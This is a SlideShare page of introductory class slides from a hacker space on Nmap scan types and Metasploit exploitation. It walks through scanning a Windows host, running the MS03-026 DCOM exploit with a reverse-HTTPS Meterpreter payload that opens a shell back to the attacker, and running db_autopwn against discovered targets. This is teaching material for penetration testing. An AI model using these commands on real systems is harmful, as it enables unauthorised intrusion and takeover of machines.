SlideShare a Scribd company logo

Using metasploit

C
CyberRad

Slides for the Using Metasploit class at Southern Maryland Hacker Space.

TechnologyBusiness
1 of 23
Using Nmap and Metasploit Presented by: Conrad Brown cbrown@radnetworx.com http://www.lokisec.com http://twitter.com/guardrad
Who I am Founder of Lokisec.com and Southern Maryland Hacker Space Alphabet Soup A+, Net+, Sec+, MCSE, MCITP, CEH, ECSA Not an expert in Metasploit or Nmap
What is Nmap? Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
TCP Connection Flow Source: http://publib.boulder.ibm.com/infocenter/tpfhelp/current/index.jsp?topic=%2Fcom.ibm.ztpf-ztpfdf.doc_put.cur%2Fgtps5%2Fs5tcpcf.html
Typical Nmap scans -sS: TCP SYN sS tells Nmap to send a SYN packet to Nmap’s default port list, which includes the most common ports a service my run on. If a SYN/ACK packet is received then the port is open. If a RST packet is received then the port is closed. -sT: Connect() sT tells Nmap to issue a connect() system call to each port in Nmap’s default port list. If the connect() call is successful then the port is open. If it fails or is blocked then the port is closed.
Typical Nmap scans cont. -sA: ACK sA tells Nmap to send an ACK packet to Nmap’s default port list. If a RST packet has been received then those ports are marked as unfiltered. This means that there was not a stateful firewall prior to your target. If some other message is received then Nmap marks those ports as filtered. -sW: Window sW tells Nmap to send an ACK packet to Nmap’s default port list just like -sA.  This scan however looks at the TCP Window property.  Open ports have a window size listed.  Closed ports will have a 0 window size listed.
Typical Nmap scans cont. -sM: Maimon scans sM tells Nmap to send a Fin/ACK to Nmap’s default port list. Most systems respond with a RST packet for both opened and closed ports. However, some BSD systems will drop the packet if the port is opened. -sU: UDP Scan sU tells Nmap to send an empty UDP packet to Nmap’s default port list. If an ICMP type 3 code 3 message is returned then the port is marked as closed. If an ICMP type 3 codes 1, 2, 9, 10, or 13 is returned then the port is labeled as filtered. If a service responds then the port is open. If a service responds and then does not respond to a second UDP packet then the port labeled as open filtered.
Typical Nmap scans cont. -sN: TCP Null sN tells Nmap to send an empty or Null packet to Nmap’s default port list. Because this packet does not contain a SYN, RST, or ACK bit a packet with the RST bit is returned if the port is closed. If the port is open then no response is given. This only works on devices that are compliant with RFC 793. -sF: FIN sF tells Nmap to send a packet with the FIN bit set to Nmap’s default port list. Because this packet does not contain a SYN, RST, or ACK bit a packet with the RST bit is returned if the port is closed. If the port is open then no response is given. This only works on devices that are compliant with RFC 793.
Typical Nmap scans cont. -sX: Xmas Scan sX tells Nmap to send a packet with the FIN, PSH, and URG bits set to Nmap’s default port list. Because this packet does not contain a SYN, RST, or ACK bit a packet with the RST bit is returned if the port is closed. If the port is open then no response is given. This only works on devices that are compliant with RFC 793.
Scan our target using Nmap Let’s get the open TCP ports and the OS Nmap -sS -O -v <Target IP/Range>
A wealth of information As you can see we have TCP ports 135, 139, 445, 1025, and 5000 opened. There’s a good chance this is a Windows box. -O -v tells us that it is an unpatched 2000 or XP box.
Searching through CVEs With the information from the Nmap scan look through cve.mitre.org CVE-2003-0812 (MS03_026) CVE-2006-4688 (MS06_066)
What is Metasploit? The Metasploit® Framework is a free, open source penetration testing solution developed by the open source community and Rapid7. It is the de-facto standard for penetration testing with more than one million unique downloads per year and the world’s largest, public database of quality assured exploits.
What is Metasploit? Features are constantly evolving which means items that once worked one way may not work that way now.
Terms Vulnerability - a weakness which allows attackers to reduce a system’s information assurance. Exploit - a piece of code that takes advantage of a systems vulnerabilities. Payload - a piece of software that lets you control a system after it has been exploited.
Open Metasploit CD /pentest/exploits/framework ./msfconsole
Easy exploit: MS03_026 Use exploit/windows/dcerpc/ms03_026_dcom Set payload windows/meterpreter/reverse_https Set lhost <IP of Metasploit machine> Set rhost <IP of victim> exploit
Shell! Now you have shell on the box and can have your way with it.
Another (noisy) way! Start mySQL start mysql Start Metasploit msfconsole
Another (noisy) way! cont. Tell Metasploit to use the mySQL DB driver: db_drivermysql Tell Metasploit to connect to the database: db_connect root:toor@127.0.0.1/<db>
Another (noisy) way! cont. Run Nmap inside Metasploit and auto populate the database with targets: db_nmap -sS -O -v <Target> Check the database for information gathered: hosts services
Another (noisy) way! cont. db_autopwn -t -p -e db_autopwn tries all known exploits to vulnerabilities that match the criteria (services) in the database. Again this is noisy!
Better use of db_autopwn db_autopwn -p -t This will show you exploits that match the opened ports. This will narrow your exploit search down to those that could potentially work instead of going through all of the CVEs.

Recommended

Security Onion Advance
Security Onion AdvanceSecurity Onion Advance
Security Onion Advance
Kaustubh Padwad
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanning
amiable_indian
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanning
amiable_indian
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
Aryan G
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Bishop Fox
 
Tcpdump
TcpdumpTcpdump
Tcpdump
Sourav Roy
 
Creating a firewall in UBUNTU
Creating a firewall in UBUNTUCreating a firewall in UBUNTU
Creating a firewall in UBUNTU
Mumbai University
 

Recommended

Security Onion Advance
Security Onion AdvanceSecurity Onion Advance
Security Onion Advance
Kaustubh Padwad
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanning
amiable_indian
 
Metasploit: Pwnage and Ponies
Metasploit: Pwnage and PoniesMetasploit: Pwnage and Ponies
Metasploit: Pwnage and Ponies
Trowalts
 
Dynamic Port Scanning
Dynamic Port ScanningDynamic Port Scanning
Dynamic Port Scanning
amiable_indian
 
Nmap Hacking Guide
Nmap Hacking GuideNmap Hacking Guide
Nmap Hacking Guide
Aryan G
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Bishop Fox
 
Tcpdump
TcpdumpTcpdump
Tcpdump
Sourav Roy
 
Creating a firewall in UBUNTU
Creating a firewall in UBUNTUCreating a firewall in UBUNTU
Creating a firewall in UBUNTU
Mumbai University
 
Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
OWASP Delhi
 
Access over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoEAccess over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoE
amiable_indian
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
Mohammed Akbar Shariff
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
Phannarith Ou, G-CISO
 
Networking in linux
Networking in linuxNetworking in linux
Networking in linux
Varnnit Jain
 
NMap
NMapNMap
NMap
Pritesh Raka
 
Netcat
NetcatNetcat
Netcat
penetration Tester
 
Nmap
NmapNmap
Nmap
Megha Sahu
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)
SSASIT
 
Sniffing in a Switched Network
Sniffing in a Switched NetworkSniffing in a Switched Network
Sniffing in a Switched Network
amiable_indian
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
idsecconf
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
Shaikh Jamal Uddin l CISM, QRadar, Hack Card Recovery Expert
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Monit
MonitMonit
Monit
Abhishek Singh
 
Scanning with nmap
Scanning with nmapScanning with nmap
Scanning with nmap
commiebstrd
 
CNIT 50: 6. Command Line Packet Analysis Tools
CNIT 50: 6. Command Line Packet Analysis ToolsCNIT 50: 6. Command Line Packet Analysis Tools
CNIT 50: 6. Command Line Packet Analysis Tools
Sam Bowne
 
Nmap for Scriptors
Nmap for ScriptorsNmap for Scriptors
Nmap for Scriptors
n|u - The Open Security Community
 
Network Mapper (NMAP)
Network Mapper (NMAP)Network Mapper (NMAP)
Network Mapper (NMAP)
KHNOG
 
NMAP
NMAPNMAP
NMAP
PrateekAryan1
 
Nmap Basics
Nmap BasicsNmap Basics
Nmap Basics
amiable_indian
 
carbon credit
carbon creditcarbon credit
carbon credit
Jithin Krishnan
 

More Related Content

What's hot

Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
amiable_indian
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 

What's hot (20)

Recon with Nmap
Recon with Nmap Recon with Nmap
Recon with Nmap
 
Access over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoEAccess over Ethernet: Insecurites in AoE
Access over Ethernet: Insecurites in AoE
 
Nmap and metasploitable
Nmap and metasploitableNmap and metasploitable
Nmap and metasploitable
 
Understanding NMAP
Understanding NMAPUnderstanding NMAP
Understanding NMAP
 
Networking in linux
Networking in linuxNetworking in linux
Networking in linux
 
NMap
NMapNMap
NMap
 
Netcat
NetcatNetcat
Netcat
 
Nmap
NmapNmap
Nmap
 
Nmap(network mapping)
Nmap(network mapping)Nmap(network mapping)
Nmap(network mapping)
 
Sniffing in a Switched Network
Sniffing in a Switched NetworkSniffing in a Switched Network
Sniffing in a Switched Network
 
Hacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning TechniquesHacking With Nmap - Scanning Techniques
Hacking With Nmap - Scanning Techniques
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Monit
MonitMonit
Monit
 
Scanning with nmap
Scanning with nmapScanning with nmap
Scanning with nmap
 
CNIT 50: 6. Command Line Packet Analysis Tools
CNIT 50: 6. Command Line Packet Analysis ToolsCNIT 50: 6. Command Line Packet Analysis Tools
CNIT 50: 6. Command Line Packet Analysis Tools
 
Nmap for Scriptors
Nmap for ScriptorsNmap for Scriptors
Nmap for Scriptors
 
Network Mapper (NMAP)
Network Mapper (NMAP)Network Mapper (NMAP)
Network Mapper (NMAP)
 
NMAP
NMAPNMAP
NMAP
 

Viewers also liked

государственные люди м.и. кутузов
государственные люди м.и. кутузовгосударственные люди м.и. кутузов
государственные люди м.и. кутузов
Iren Zielinski
 
Evaluation question2
Evaluation question2Evaluation question2
Evaluation question2
leeyameghani
 
Cоздание библиотечных фотоальбомов и Google+
Cоздание библиотечных фотоальбомов и Google+Cоздание библиотечных фотоальбомов и Google+
Cоздание библиотечных фотоальбомов и Google+
Iren Zielinski
 
путеводитель по виртуальной информационно краеведческой выставке
путеводитель по виртуальной информационно краеведческой выставкепутеводитель по виртуальной информационно краеведческой выставке
путеводитель по виртуальной информационно краеведческой выставке
Iren Zielinski
 
Jennifer's class presentation
Jennifer's class presentationJennifer's class presentation
Jennifer's class presentation
jennifercombs371
 
писатели и художники
писатели и художникиписатели и художники
писатели и художники
Iren Zielinski
 
Jennifer's class presentation
Jennifer's class presentationJennifer's class presentation
Jennifer's class presentation
jennifercombs371
 
Pre questionnaire graphs
Pre questionnaire graphsPre questionnaire graphs
Pre questionnaire graphs
leeyameghani
 
Presentation11 111017084500-phpapp01
Presentation11 111017084500-phpapp01Presentation11 111017084500-phpapp01
Presentation11 111017084500-phpapp01
leeyameghani
 
военные деятели россии
военные деятели россиивоенные деятели россии
военные деятели россии
Iren Zielinski
 
военные деятели россии
военные деятели россиивоенные деятели россии
военные деятели россии
Iren Zielinski
 
DESAFIO
DESAFIODESAFIO
DESAFIO
cmam11
 
устный журнал
устный журналустный журнал
устный журнал
Iren Zielinski
 

Viewers also liked (20)

Nmap Basics
Nmap BasicsNmap Basics
Nmap Basics
 
carbon credit
carbon creditcarbon credit
carbon credit
 
государственные люди м.и. кутузов
государственные люди м.и. кутузовгосударственные люди м.и. кутузов
государственные люди м.и. кутузов
 
Evaluation question2
Evaluation question2Evaluation question2
Evaluation question2
 
Conduccion politica
Conduccion politicaConduccion politica
Conduccion politica
 
Cоздание библиотечных фотоальбомов и Google+
Cоздание библиотечных фотоальбомов и Google+Cоздание библиотечных фотоальбомов и Google+
Cоздание библиотечных фотоальбомов и Google+
 
путеводитель по виртуальной информационно краеведческой выставке
путеводитель по виртуальной информационно краеведческой выставкепутеводитель по виртуальной информационно краеведческой выставке
путеводитель по виртуальной информационно краеведческой выставке
 
Jennifer's class presentation
Jennifer's class presentationJennifer's class presentation
Jennifer's class presentation
 
Cookstream
CookstreamCookstream
Cookstream
 
писатели и художники
писатели и художникиписатели и художники
писатели и художники
 
Jennifer's class presentation
Jennifer's class presentationJennifer's class presentation
Jennifer's class presentation
 
Chibyke Global Systems Limited Profile
Chibyke Global Systems Limited ProfileChibyke Global Systems Limited Profile
Chibyke Global Systems Limited Profile
 
Pre questionnaire graphs
Pre questionnaire graphsPre questionnaire graphs
Pre questionnaire graphs
 
Bab iv
Bab ivBab iv
Bab iv
 
Presentation11 111017084500-phpapp01
Presentation11 111017084500-phpapp01Presentation11 111017084500-phpapp01
Presentation11 111017084500-phpapp01
 
военные деятели россии
военные деятели россиивоенные деятели россии
военные деятели россии
 
военные деятели россии
военные деятели россиивоенные деятели россии
военные деятели россии
 
Mobile health insurance exchange
Mobile health insurance exchangeMobile health insurance exchange
Mobile health insurance exchange
 
DESAFIO
DESAFIODESAFIO
DESAFIO
 
устный журнал
устный журналустный журнал
устный журнал
 

Similar to Using metasploit

Packet sniffing in switched LANs
Packet sniffing in switched LANsPacket sniffing in switched LANs
Packet sniffing in switched LANs
Ishraq Al Fataftah
 
Computer network (11)
Computer network (11)Computer network (11)
Computer network (11)
NYversity
 
Firewalls rules using iptables in linux
Firewalls rules using iptables in linuxFirewalls rules using iptables in linux
Firewalls rules using iptables in linux
aamir lucky
 
Module 3 Scanning
Module 3 ScanningModule 3 Scanning
Module 3 Scanning
leminhvuong
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
Amanpreet Singh
 
Copy of a simple tcp spoofing attack
Copy of a simple tcp spoofing attackCopy of a simple tcp spoofing attack
Copy of a simple tcp spoofing attack
Vishal Gurujuwada
 

Similar to Using metasploit (20)

Analysis of ESET Smart Security 6 personal firewall’s thresholds and detectio...
Analysis of ESET Smart Security 6 personal firewall’s thresholds and detectio...Analysis of ESET Smart Security 6 personal firewall’s thresholds and detectio...
Analysis of ESET Smart Security 6 personal firewall’s thresholds and detectio...
 
Contents namp
Contents nampContents namp
Contents namp
 
Contents namp
Contents nampContents namp
Contents namp
 
Backtrack Manual Part3
Backtrack Manual Part3Backtrack Manual Part3
Backtrack Manual Part3
 
Nmap
NmapNmap
Nmap
 
Packet sniffing in switched LANs
Packet sniffing in switched LANsPacket sniffing in switched LANs
Packet sniffing in switched LANs
 
NMAP1.ppt
NMAP1.pptNMAP1.ppt
NMAP1.ppt
 
Scanning
ScanningScanning
Scanning
 
Zen map
Zen mapZen map
Zen map
 
Packet sniffingin switch lans
Packet sniffingin switch lansPacket sniffingin switch lans
Packet sniffingin switch lans
 
01204427-scanner.ppt
01204427-scanner.ppt01204427-scanner.ppt
01204427-scanner.ppt
 
Tomasz P from Poland
Tomasz P from PolandTomasz P from Poland
Tomasz P from Poland
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information Gathering
 
Computer network (11)
Computer network (11)Computer network (11)
Computer network (11)
 
Firewalls rules using iptables in linux
Firewalls rules using iptables in linuxFirewalls rules using iptables in linux
Firewalls rules using iptables in linux
 
Module 3 Scanning
Module 3 ScanningModule 3 Scanning
Module 3 Scanning
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
NMap 101 offline meetup by CyberForge Academy
NMap 101 offline meetup by CyberForge AcademyNMap 101 offline meetup by CyberForge Academy
NMap 101 offline meetup by CyberForge Academy
 
Iptables presentation
Iptables presentationIptables presentation
Iptables presentation
 
Copy of a simple tcp spoofing attack
Copy of a simple tcp spoofing attackCopy of a simple tcp spoofing attack
Copy of a simple tcp spoofing attack
 

Recently uploaded

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
Safe Software
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
Enterprise Knowledge
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
Delhi Call girls
 

Recently uploaded (20)

GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 

Using metasploit

  • 1. Using Nmap and Metasploit Presented by: Conrad Brown cbrown@radnetworx.com http://www.lokisec.com http://twitter.com/guardrad
  • 2. Who I am Founder of Lokisec.com and Southern Maryland Hacker Space Alphabet Soup A+, Net+, Sec+, MCSE, MCITP, CEH, ECSA Not an expert in Metasploit or Nmap
  • 3. What is Nmap? Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are available for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), a utility for comparing scan results (Ndiff), and a packet generation and response analysis tool (Nping).
  • 4. TCP Connection Flow Source: http://publib.boulder.ibm.com/infocenter/tpfhelp/current/index.jsp?topic=%2Fcom.ibm.ztpf-ztpfdf.doc_put.cur%2Fgtps5%2Fs5tcpcf.html
  • 5. Typical Nmap scans -sS: TCP SYN sS tells Nmap to send a SYN packet to Nmap’s default port list, which includes the most common ports a service my run on. If a SYN/ACK packet is received then the port is open. If a RST packet is received then the port is closed. -sT: Connect() sT tells Nmap to issue a connect() system call to each port in Nmap’s default port list. If the connect() call is successful then the port is open. If it fails or is blocked then the port is closed.
  • 6. Typical Nmap scans cont. -sA: ACK sA tells Nmap to send an ACK packet to Nmap’s default port list. If a RST packet has been received then those ports are marked as unfiltered. This means that there was not a stateful firewall prior to your target. If some other message is received then Nmap marks those ports as filtered. -sW: Window sW tells Nmap to send an ACK packet to Nmap’s default port list just like -sA.  This scan however looks at the TCP Window property.  Open ports have a window size listed.  Closed ports will have a 0 window size listed.
  • 7. Typical Nmap scans cont. -sM: Maimon scans sM tells Nmap to send a Fin/ACK to Nmap’s default port list. Most systems respond with a RST packet for both opened and closed ports. However, some BSD systems will drop the packet if the port is opened. -sU: UDP Scan sU tells Nmap to send an empty UDP packet to Nmap’s default port list. If an ICMP type 3 code 3 message is returned then the port is marked as closed. If an ICMP type 3 codes 1, 2, 9, 10, or 13 is returned then the port is labeled as filtered. If a service responds then the port is open. If a service responds and then does not respond to a second UDP packet then the port labeled as open filtered.
  • 8. Typical Nmap scans cont. -sN: TCP Null sN tells Nmap to send an empty or Null packet to Nmap’s default port list. Because this packet does not contain a SYN, RST, or ACK bit a packet with the RST bit is returned if the port is closed. If the port is open then no response is given. This only works on devices that are compliant with RFC 793. -sF: FIN sF tells Nmap to send a packet with the FIN bit set to Nmap’s default port list. Because this packet does not contain a SYN, RST, or ACK bit a packet with the RST bit is returned if the port is closed. If the port is open then no response is given. This only works on devices that are compliant with RFC 793.
  • 9. Typical Nmap scans cont. -sX: Xmas Scan sX tells Nmap to send a packet with the FIN, PSH, and URG bits set to Nmap’s default port list. Because this packet does not contain a SYN, RST, or ACK bit a packet with the RST bit is returned if the port is closed. If the port is open then no response is given. This only works on devices that are compliant with RFC 793.
  • 10. Scan our target using Nmap Let’s get the open TCP ports and the OS Nmap -sS -O -v <Target IP/Range>
  • 11. A wealth of information As you can see we have TCP ports 135, 139, 445, 1025, and 5000 opened. There’s a good chance this is a Windows box. -O -v tells us that it is an unpatched 2000 or XP box.
  • 12. Searching through CVEs With the information from the Nmap scan look through cve.mitre.org CVE-2003-0812 (MS03_026) CVE-2006-4688 (MS06_066)
  • 13. What is Metasploit? The Metasploit® Framework is a free, open source penetration testing solution developed by the open source community and Rapid7. It is the de-facto standard for penetration testing with more than one million unique downloads per year and the world’s largest, public database of quality assured exploits.
  • 14. What is Metasploit? Features are constantly evolving which means items that once worked one way may not work that way now.
  • 15. Terms Vulnerability - a weakness which allows attackers to reduce a system’s information assurance. Exploit - a piece of code that takes advantage of a systems vulnerabilities. Payload - a piece of software that lets you control a system after it has been exploited.
  • 16. Open Metasploit CD /pentest/exploits/framework ./msfconsole
  • 17. Easy exploit: MS03_026 Use exploit/windows/dcerpc/ms03_026_dcom Set payload windows/meterpreter/reverse_https Set lhost <IP of Metasploit machine> Set rhost <IP of victim> exploit
  • 18. Shell! Now you have shell on the box and can have your way with it.
  • 19. Another (noisy) way! Start mySQL start mysql Start Metasploit msfconsole
  • 20. Another (noisy) way! cont. Tell Metasploit to use the mySQL DB driver: db_drivermysql Tell Metasploit to connect to the database: db_connect root:toor@127.0.0.1/<db>
  • 21. Another (noisy) way! cont. Run Nmap inside Metasploit and auto populate the database with targets: db_nmap -sS -O -v <Target> Check the database for information gathered: hosts services
  • 22. Another (noisy) way! cont. db_autopwn -t -p -e db_autopwn tries all known exploits to vulnerabilities that match the criteria (services) in the database. Again this is noisy!
  • 23. Better use of db_autopwn db_autopwn -p -t This will show you exploits that match the opened ports. This will narrow your exploit search down to those that could potentially work instead of going through all of the CVEs.